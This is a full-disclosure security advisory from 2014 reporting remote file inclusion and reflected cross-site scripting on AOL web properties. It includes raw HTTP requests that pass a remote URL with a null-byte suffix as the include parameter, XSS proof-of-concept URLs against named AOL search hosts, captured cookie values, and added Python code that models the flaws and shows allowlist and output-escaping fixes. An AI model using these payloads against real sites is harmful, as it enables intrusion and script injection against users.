
AOL File Inclusion / Cross Site Scripting
Posted Jan 22, 2014
Authored by Juan Carlos Garcia

America Online (AOL) suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, file inclusion
MD5 | 0d9462b1f15af5ece7e02a57bd97dabc


AOL File Inclusion / Cross Site Scripting
*******************************


Vulnerability time-line
------------------------

-Multiple security advisories sent to the vendor

-No response

-No feedback

-Not fixed

-Another security advisory (and another)

-No response, no feedback

-Full disclosure


I. VULNERABILITY
-------------------------

#Title: AOL File Inclusion / Cross Site Scripting

#Vendor: http://www.aol.com

#Author: Juan Carlos García (@secnight)
#Author: Francisco Moraga (@btshell)

www.asap-sec.com



II. DESCRIPTION
-------------------------

AOL Inc. (previously known as America Online, written as AOL and styled as "Aol." but commonly pronounced as an initialism) is an American multinational mass media corporation based in New York City that develops, grows, and invests in brands and web sites.
The company's business spans digital distribution of content, products, and services, which it offers to consumers, publishers, and advertisers.

Founded in 1983 as Control Video Corporation and rebuilt by Jim Kimsey from that company's remnants as an online services company, AOL has franchised its services to companies in several nations around the world or set up international versions of its services. AOL is headquartered at 770 Broadway in New York.


(Wikipedia)

III. PROOF OF CONCEPT
------------------


Remote File Inclusion
*******************


Vulnerability description
---------------------------


The script /ajax.jsp is vulnerable to file inclusion attacks.

It includes a resource whose path is built from user-supplied data (the m and p query parameters, as the attack details below show).

That data is not validated before it is passed to the include.



Affected items
----------------

/ajax.jsp (5 variants found)


The impact of this vulnerability
--------------------------------
A remote attacker can make the application include a file named in the request, from a local or (if the include layer fetches URLs) remote location, and so potentially execute arbitrary script code with the privileges of the web server.
Note what the proof of concept below does and does not show: the container's error message proves that the m and p values reach the include path unfiltered, while the 200 response carrying a short JavaScript body shows the attempt being rejected as a missing resource. Actual retrieval of a remote URL is not demonstrated here.


How to fix this vulnerability
------------------------------
Edit the source code so that the input is properly validated. Where possible, build a list of accepted module and file names and restrict the input to that list; reject anything else rather than trying to strip unwanted characters from it.


Attack details
-----------------

URL encoded GET input m was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response


HTTP/1.1 200 OK

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

Cache-Control: no-cache, no-store, private, max-age=0

Expires: 0

Content-Type: text/javascript;charset=UTF-8

Content-Length: 130

Set-Cookie: JSESSIONID=C08A9752C9DF6FE072CF35073B14F824; Path=/aol

Set-Cookie: JSESSIONID=; Domain=aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive
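The error messages above are enough to model how the include target is put together, and to put the allowlist fix from the "How to fix" section next to it. The code below is an added example written for this page and is not AOL's ajax.jsp (that source is not public). It assumes, from the two error messages, that the decoded m and p parameters are joined under /aol/main/modules/ and that the container reports the resource only up to the first "?"; the allowlists, the NAME_RE pattern and all function names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

MODULE_ROOT = "/aol/main/modules"

# Request line from the advisory's "Attack details" (cookie header omitted).
ADVISORY_REQUEST = (
    "GET /ajax.jsp?ajax=1&cv=6&dlItem=432572"
    "&m=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg"
    "&offset=0&p=dynamicleadslide&sitHot=&slot=dynamiclead&vbclass=vid_over"
    "&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1"
)


def params_from_request_line(request_line: str) -> tuple:
    """Return the URL-decoded m and p query parameters of a raw GET line."""
    _method, target, _version = request_line.split()
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return qs.get("m", [""])[0], qs.get("p", [""])[0]


ADVISORY_M, ADVISORY_P = params_from_request_line(ADVISORY_REQUEST)


def vulnerable_include_path(m: str, p: str) -> str:
    """Assumed behaviour of the vulnerable page: both parameters are
    concatenated into the module path with no validation at all."""
    return f"{MODULE_ROOT}/{m}/{p}"


def reported_resource(include_path: str) -> str:
    """What the container's 'requested resource ... is not available' message
    shows: the path up to the first '?'. Assumption drawn from the advisory's
    output (the remainder is treated as a query string on internal dispatch)."""
    return include_path.split("?", 1)[0]


# Hardened resolver: the request may only pick among known names, so URL
# schemes, path separators, '..' and NUL bytes never reach the include call.
ALLOWED_MODULES = frozenset({"dynamiclead"})       # constructed allowlist
ALLOWED_PAGES = frozenset({"dynamicleadslide"})    # constructed allowlist
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class RejectedInclude(ValueError):
    """Raised when a request names a module or page outside the allowlist."""


def hardened_include_path(m: str, p: str) -> str:
    for value, allowed in ((m, ALLOWED_MODULES), (p, ALLOWED_PAGES)):
        if not NAME_RE.fullmatch(value) or value not in allowed:
            raise RejectedInclude(f"include name not permitted: {value!r}")
    return f"{MODULE_ROOT}/{m}/{p}"


def hardened_accepts(m: str, p: str) -> bool:
    """True when the hardened resolver would serve the request."""
    try:
        hardened_include_path(m, p)
    except RejectedInclude:
        return False
    return True


def looks_like_inclusion_probe(value: str) -> bool:
    """Log-side check for the patterns the scanner used here: a URL scheme,
    a NUL byte (raw or still percent-encoded) or a parent-directory step in
    a value that should be a bare module name."""
    lowered = value.lower()
    return "://" in lowered or "\x00" in value or "%00" in lowered or ".." in value


if __name__ == "__main__":
    print("decoded m:", ADVISORY_M)
    print("vulnerable resolves to:",
          reported_resource(vulnerable_include_path(ADVISORY_M, ADVISORY_P)))
    print("hardened accepts probe:", hardened_accepts(ADVISORY_M, ADVISORY_P))
    print("hardened accepts normal request:",
          hardened_accepts("dynamiclead", "dynamicleadslide"))
```

Under these assumptions the vulnerable resolver reproduces both error paths in the advisory (the m variant and the p variant with m=dynamiclead), and the hardened resolver rejects both probes while still serving the legitimate dynamiclead/dynamicleadslide pair.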






Variant 3
---------

URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


Request

GET /ajax.jsp?ajax=1&cv=6&dlItem=432572&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D



Variant 4
---------

Attack details
----------------
URL encoded GET input p was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Error message found:

The requested resource (/aol/main/modules/dynamiclead/http://some-inexistent-website.acu/some_inexistent_file_with_long_name) is not available


GET /ajax.jsp?ajax=1&cv=6&dlItem=431789&m=dynamiclead&offset=0&p=http%3a%2f%2fsome-inexistent-website.acu%2fsome_inexistent_file_with_long_name%3f%2500.jpg&sitHot=&slot=dynamiclead&vbclass=vid_over&vcslot=dynamiclead-video-config&_c=main5 HTTP/1.1

Referer: http://www.aol.com:80/

Cookie: tst=%2C51%2Cs391a%3A%2C52%2Cs392a%3A%2C49%2Cs393a%3A%2C48%2Cs394a%3A%2C42%2Cs395a%3A%2C44%2Cs396a%3A%2C40%2Cs397a%3A%2C33%2Cs398a%3A%2C35%2Cs399a%3A%2C35%2Cs400a%3A%2C31%2Cs401a%3A%2C31%2Cs402a%3A%2C5%2Cs403a%3A%2C6%2Cs404a; s_vi=[CS]v1|296F251E051D31A7-4000013680000AE1[CE]; UNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; CUNAUTHID=1.c0be723094434eff9d2200121277667c.7cb9; tsto=; molhp=; mtmhp_ncid_icid=?xicid=acm50mtmhppromorc; mol=; favftux=true; JSESSIONID=; aolweatherlocation=91744; uauserid=cdb4b64f-04d8-499f-ac25-b16f159b066b; reclocs=V1|La%2BPuente%252C%2BCA%257CLa%2BPuente%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529%253B91744%257CLa%2BPuente%252CCA%252891744%2529%253BCity%252C%2BState%2Bor%2BZIP%2BPlease%2521%257CCity%2BOf%2BIndustry%252CLos%2BAngeles%2BCounty%2BCounty%252CCA%252891744%2529; s_sess=%20s_sq%3D%3B; s_pers=%20s_nrgvo%3DNew%7C1453371978408%3B;rrpmo1=rr1~2~1390299741293~0; dlact=dl1; tzoffset=V1|js_1; stips5=main5-local; tips5=favorites getstart:-1; oldArticles=oldArts%3D%5B%5D


Response
----------
HTTP/1.1 200 OK

Cache-Control: max-age=5
Connection: Keep-Alive

Via: AOL-CACHE

x-ua-compatible: IE=EmulateIE9

Pragma: no-cache

test-timestamp: 1390300006644

Content-Type: text/javascript;charset=UTF-8

Content-Length: 142

Keep-Alive: timeout=5, max=100



Cross Site Scripting
*********************


http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3Ealert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E


http://search.aol.co.uk/aol/webhome?s_chn=%3C%2Fscript%3E%3Cscript%3Ealert%28%22Secnight+and+BTshell+says..+Security+Advisory%3A+Not+FeedBack+Not+Response+Not+Fixed..+Full+Disclosure+asap-sec.com%22%29%3B%3C%2Fscript%3E%3Cscript%3E …
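The payload in both URLs starts with </script>, which only pays off if s_chn is reflected inside an existing script block: the closing tag ends that block, the injected script runs, and the trailing <script> re-opens a block so whatever followed the reflection still parses. The code below is an added example written for this page, not AOL's search page: the template string is constructed to reproduce that reflection context (an inference from the payload shape, not something the advisory states), and the hardened variant shows the encoding that keeps the value inside the JavaScript string.

```python
import json
from urllib.parse import parse_qs, urlsplit

# First proof-of-concept URL from the advisory.
ADVISORY_URL = ("http://search.aol.com/aol/webhome?s_chn=%3C/script%3E%3Cscript%3E"
                "alert%28%22Secnight%20and%20BTshell%22%29;%3C/script%3E%3Cscript%3E")


def s_chn_from_url(url: str) -> str:
    """URL-decode the s_chn parameter the way the server would."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["s_chn"][0]


def render_vulnerable(s_chn: str) -> str:
    """Constructed template: the parameter lands verbatim inside a JS string."""
    return f'<script>var s_chn = "{s_chn}";</script>'


def js_string_literal(value: str) -> str:
    """JSON-encode, then replace the characters that matter to the HTML
    parser. The HTML parser does not track JS string state and ends a
    <script> element at the first '</script' it sees, so '<' must never
    appear literally inside the block."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_hardened(s_chn: str) -> str:
    return f"<script>var s_chn = {js_string_literal(s_chn)};</script>"


def script_elements(markup: str) -> int:
    """Count <script start tags. The template contains exactly one, so any
    other count means the reflected value broke out of the string and tag."""
    return markup.lower().count("<script")


def breaks_out(render, s_chn: str) -> bool:
    return script_elements(render(s_chn)) != 1


def round_trips(value: str) -> bool:
    """The escaped literal must still decode to the original value, i.e. the
    encoding changes representation only, not the data the page receives."""
    return json.loads(js_string_literal(value)) == value


if __name__ == "__main__":
    payload = s_chn_from_url(ADVISORY_URL)
    print("decoded payload:", payload)
    print("vulnerable page:", render_vulnerable(payload))
    print("hardened page:  ", render_hardened(payload))
    print("break-out, vulnerable:", breaks_out(render_vulnerable, payload))
    print("break-out, hardened: ", breaks_out(render_hardened, payload))
```

The same js_string_literal encoding also covers a value reflected into an inline event handler or a JSON blob embedded in the page, which is why escaping to \u003c is preferable to HTML-entity encoding inside a script block (entities are not decoded there).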


IV. AUTHORS
-----------
Juan Carlos García @secnight
Francisco Moraga @BTshell
ASAP Security (As Soon As Possible)

www.asap-sec.com

LEGAL NOTICES
--------------

The authors accept no responsibility for any damage caused by the use or misuse of this information.
